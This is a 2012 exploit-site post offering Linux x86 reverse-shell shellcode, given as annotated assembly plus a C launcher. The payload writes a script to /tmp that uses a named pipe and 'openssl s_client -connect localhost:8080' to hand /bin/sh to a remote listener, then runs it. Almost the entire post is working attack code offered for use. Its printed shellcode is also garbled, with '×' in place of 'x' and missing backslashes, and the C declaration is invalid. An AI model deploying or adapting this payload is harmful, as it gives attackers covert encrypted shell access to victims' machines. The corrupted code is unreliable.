[linux/x86] – linux/x86 BackBox BackConnect & Reverse TCP SSL shellcode 442 bytes
# Title :Linux x86 BackBox BackConnect & Reverse TCP SSL shellcode 442 byte(s)
# Author : TrOoN
# E-mail : www.facebook.com/fysl.fyslm
# Home : city 617 logt Draria algeria
# Web Site : www.1337day.com
# platform :backboX 32 bit Eng
# Type : local root / exploit / shellcode / etc
# download link : backbox.org
#1337day sys : use port 8080 :p
###
#~~~~~~~~# hasbin rohkom khirmana 9a3din gir f 9dime yakhii 3bade pff # ~~~~~~~~#
— —— assmb just begin herE —————————————
** 08048054 <main>:
** 8048054: 31 c0 xor %eax,%eax
** 8048056: 50 push %eax
** 8048057: 6a 65 push $0×65
** 8048059: 68 6b 70 69 70 push $0×7069706b
** 804805e: 68 2f 62 61 63 push $0×6361622f
** 8048063: 68 2f 74 6d 70 push $0×706d742f
** 8048068: 89 e3 mov %esp,%ebx
** 804806a: b0 0a mov $0xa,%al
** 804806c: cd 80 int $0×80
** 804806e: 85 c0 test %eax,%eax
** 8048070: 75 32 jne 80480a4 <del2>
** 8048072: 31 c0 xor %eax,%eax
** 8048074: 31 db xor %ebx,%ebx
** 8048076: 31 d2 xor %edx,%edx
** 8048078: b3 01 mov $0×1,%bl
** 804807a: 31 c0 xor %eax,%eax
** 804807c: 50 push %eax
** 804807d: 6a 6e push $0×6e
** 804807f: 66 68 64 5c pushw $0×5c64
** 8048083: 68 6c 65 74 65 push $0×6574656c
** 8048088: 68 65 20 64 65 push $0×65642065
** 804808d: 68 6b 70 69 70 push $0×7069706b
** 8048092: 68 2f 62 61 63 push $0×6361622f
** 8048097: 68 2f 74 6d 70 push $0×706d742f
** 804809c: 89 e1 mov %esp,%ecx
** 804809e: b2 17 mov $0×17,%dl
** 80480a0: b0 04 mov $0×4,%al
** 80480a2: cd 80 int $0×80
//// Del 2 cod ///
** 080480a4 <del2>:
** 80480a4: 31 c0 xor %eax,%eax
** 80480a6: 50 push %eax
** 80480a7: 66 68 73 6c pushw $0×6c73
** 80480ab: 68 2f 63 62 73 push $0×7362632f
** 80480b0: 68 2f 74 6d 70 push $0×706d742f
** 80480b5: 89 e3 mov %esp,%ebx
** 80480b7: b0 0a mov $0xa,%al
** 80480b9: cd 80 int $0×80
** 80480bb: 85 c0 test %eax,%eax
** 80480bd: 75 2a jne 80480e9 <open>
** 80480bf: 31 c0 xor %eax,%eax
** 80480c1: 31 db xor %ebx,%ebx
** 80480c3: 31 d2 xor %edx,%edx
** 80480c5: 50 push %eax
** 80480c6: 68 65 64 5c 6e push $0×6e5c6465
** 80480cb: 68 65 6c 65 74 push $0×74656c65
** 80480d0: 68 73 6c 20 64 push $0×64206c73
** 80480d5: 68 2f 63 62 73 push $0×7362632f
** 80480da: 68 2f 74 6d 70 push $0×706d742f
** 80480df: 89 e1 mov %esp,%ecx
** 80480e1: b3 01 mov $0×1,%bl
** 80480e3: b2 14 mov $0×14,%dl
** 80480e5: b0 04 mov $0×4,%al
** 80480e7: cd 80 int $0×80
** // open code //
** 080480e9 <open>:
** 80480e9: 31 c0 xor %eax,%eax
** 80480eb: 31 c9 xor %ecx,%ecx
** 80480ed: 31 d2 xor %edx,%edx
** 80480ef: 66 b9 41 04 mov $0×441,%cx
** 80480f3: 66 ba a4 01 mov $0×1a4,%dx
** 80480f7: 50 push %eax
** 80480f8: 66 68 73 6c pushw $0×6c73
** 80480fc: 68 2f 63 62 73 push $0×7362632f
** 8048101: 68 2f 74 6d 70 push $0×706d742f
** 8048106: 89 e3 mov %esp,%ebx
** 8048108: b0 05 mov $0×5,%al
** 804810a: cd 80 int $0×80
** 804810c: 89 c6 mov %eax,%esi
**
// write cod //
** 0804810e <wtite>:
** 804810e: 31 d2 xor %edx,%edx
** 8048110: 89 f3 mov %esi,%ebx
** 8048112: 31 c0 xor %eax,%eax
** 8048114: 50 push %eax
** 8048115: 66 68 70 65 pushw $0×6570
** 8048119: 68 63 6b 70 69 push $0×69706b63
** 804811e: 68 70 2f 62 61 push $0×61622f70
** 8048123: 68 3e 2f 74 6d push $0×6d742f3e
** 8048128: 68 73 68 20 31 push $0×31206873
** 804812d: 68 6e 2f 74 63 push $0×63742f6e
** 8048132: 68 20 2f 62 69 push $0×69622f20
** 8048137: 68 70 65 20 7c push $0×7c206570
** 804813c: 68 63 6b 70 69 push $0×69706b63
** 8048141: 68 70 2f 62 61 push $0×61622f70
** 8048146: 68 3c 2f 74 6d push $0×6d742f3c
**
** 804814b: 68 38 30 20 30 push $0×30203038
** 8048150: 68 74 3a 38 30 push $0×30383a74
** 8048155: 68 6c 68 6f 73 push $0×736f686c
** 804815a: 68 6c 6f 63 61 push $0×61636f6c
**
** 804815f: 68 65 63 74 20 push $0×20746365
** 8048164: 68 63 6f 6e 6e push $0×6e6e6f63
** 8048169: 68 6e 74 20 2d push $0×2d20746e
** 804816e: 68 63 6c 69 65 push $0×65696c63
** 8048173: 68 6c 20 73 5f push $0×5f73206c
** 8048178: 68 65 6e 73 73 push $0×73736e65
** 804817d: 68 6e 2f 6f 70 push $0×706f2f6e
** 8048182: 68 72 2f 62 69 push $0×69622f72
** 8048187: 68 20 2f 75 73 push $0×73752f20
** 804818c: 68 70 20 26 26 push $0×26262070
** 8048191: 68 69 70 65 20 push $0×20657069
** 8048196: 68 61 63 6b 70 push $0×706b6361
** 804819b: 68 6d 70 2f 62 push $0×622f706d
** 80481a0: 68 64 20 2f 74 push $0×742f2064
** 80481a5: 68 6d 6b 6e 6f push $0×6f6e6b6d
** 80481aa: 89 e1 mov %esp,%ecx
** 80481ac: b2 77 mov $0×77,%dl
** 80481ae: 31 c0 xor %eax,%eax
** 80481b0: b0 04 mov $0×4,%al
** 80481b2: cd 80 int $0×80
**
** 080481b4 <close>:
** 80481b4: 31 c0 xor %eax,%eax
** 80481b6: b0 06 mov $0×6,%al
** 80481b8: 89 f3 mov %esi,%ebx
** 80481ba: cd 80 int $0×80
**
** 080481bc <execve>:
** 80481bc: 31 c0 xor %eax,%eax
** 80481be: 50 push %eax
** 80481bf: 66 68 73 6c pushw $0×6c73
** 80481c3: 68 2f 63 62 73 push $0×7362632f
** 80481c8: 68 2f 74 6d 70 push $0×706d742f
** 80481cd: 89 e3 mov %esp,%ebx
** 80481cf: 50 push %eax
** 80481d0: 66 68 2d 65 pushw $0×652d
** 80481d4: 89 e1 mov %esp,%ecx
** 80481d6: 50 push %eax
** 80481d7: 6a 68 push $0×68
** 80481d9: 66 68 2f 73 pushw $0×732f
** 80481dd: 68 2f 62 69 6e push $0×6e69622f
** 80481e2: 89 e2 mov %esp,%edx
** 80481e4: 50 push %eax
** 80481e5: 53 push %ebx
** 80481e6: 51 push %ecx
** 80481e7: 52 push %edx
** 80481e8: 89 e1 mov %esp,%ecx
** 80481ea: 89 d3 mov %edx,%ebx
** 80481ec: 31 d2 xor %edx,%edx
** 80481ee: b0 0b mov $0xb,%al
** 80481f0: cd 80 int $0×80
**
** 080481f2 <exit>:
** 80481f2: 31 c0 xor %eax,%eax
** 80481f4: b0 01 mov $0×1,%al
** 80481f6: 31 db xor %ebx,%ebx
** 80481f8: cd 80 int $0×80
**
**
*/ // here :p //
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode SC[] = "x31xc0×50x6ax65×68x6bx70×69x70×68x2fx62×61x63"
"x68×2fx74×6dx70×89xe3xb0×0axcdx80×85xc0×75x32"
"x31xc0×31xdbx31xd2xb3×01x31xc0×50x6ax6ex66×68"
"x64×5cx68×6cx65×74x65×68x65×20x64×65x68×6bx70"
"x69×70x68×2fx62×61x63×68x2fx74×6dx70×89xe1xb2"
"x17xb0×04xcdx80×31xc0×50x66×68x73×6cx68×2fx63"
"x62×73x68×2fx74×6dx70×89xe3xb0×0axcdx80×85xc0"
"x75×2ax31xc0×31xdbx31xd2×50x68×65x64×5cx6ex68"
"x65×6cx65×74x68×73x6cx20×64x68×2fx63×62x73×68"
"x2fx74×6dx70×89xe1xb3×01xb2×14xb0×04xcdx80×31"
"xc0×31xc9×31xd2×66xb9×41x04×66xbaxa4×01x50×66"
"x68×73x6cx68×2fx63×62x73×68x2fx74×6dx70×89xe3"
"xb0×05xcdx80×89xc6×31xd2×89xf3×31xc0×50x66×68"
"x70×65x68×63x6bx70×69x68×70x2fx62×61x68×3ex2f"
"x74×6dx68×73x68×20x31×68x6ex2fx74×63x68×20x2f"
"x62×69x68×70x65×20x7cx68×63x6bx70×69x68×70x2f"
"x62×61x68×3cx2fx74×6d"
/* localhost:8080 */
"x68×38x30×20x30×68x74×3ax38×30x68×6cx68×6fx73"
"x68×6cx6fx63×61"
/* EOF */
"x68×65x63×74x20×68x63×6fx6ex6ex68×6ex74×20x2d"
"x68×63x6cx69×65x68×6cx20×73x5fx68×65x6ex73×73"
"x68×6ex2fx6fx70×68x72×2fx62×69x68×20x2fx75×73"
"x68×70x20×26x26×68x69×70x65×20x68×61x63×6bx70"
"x68×6dx70×2fx62×68x64×20x2fx74×68x6dx6bx6ex6f"
"x89xe1xb2×77x31xc0xb0×04xcdx80×31xc0xb0×06x89"
"xf3xcdx80×31xc0×50x66×68x73×6cx68×2fx63×62x73"
"x68×2fx74×6dx70×89xe3×50x66×68x2dx65×89xe1×50"
"x6ax68×66x68×2fx73×68x2fx62×69x6ex89xe2×50x53"
"x51×52x89xe1×89xd3×31xd2xb0×0bxcdx80×31xc0xb0"
"x01×31xdbxcdx80";
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(SC));
(*(void(*)()) SC)();
}
~~~~~~~~~~~~~~~~ 1337 day | ked ans | ALgerian | mosta_team |viper| bRsco_Dz | fire_hacker| hacker_1420 | &all
metasploit | Back track | w3schoOL | AlGerian_ | bem 2012 anchalah khoya | elite_Trojen | security-ray “ ~~~~~~
# [1337day.com][1] [2012-02-12]
[1]: http://www.1337day.com/
Leave a Reply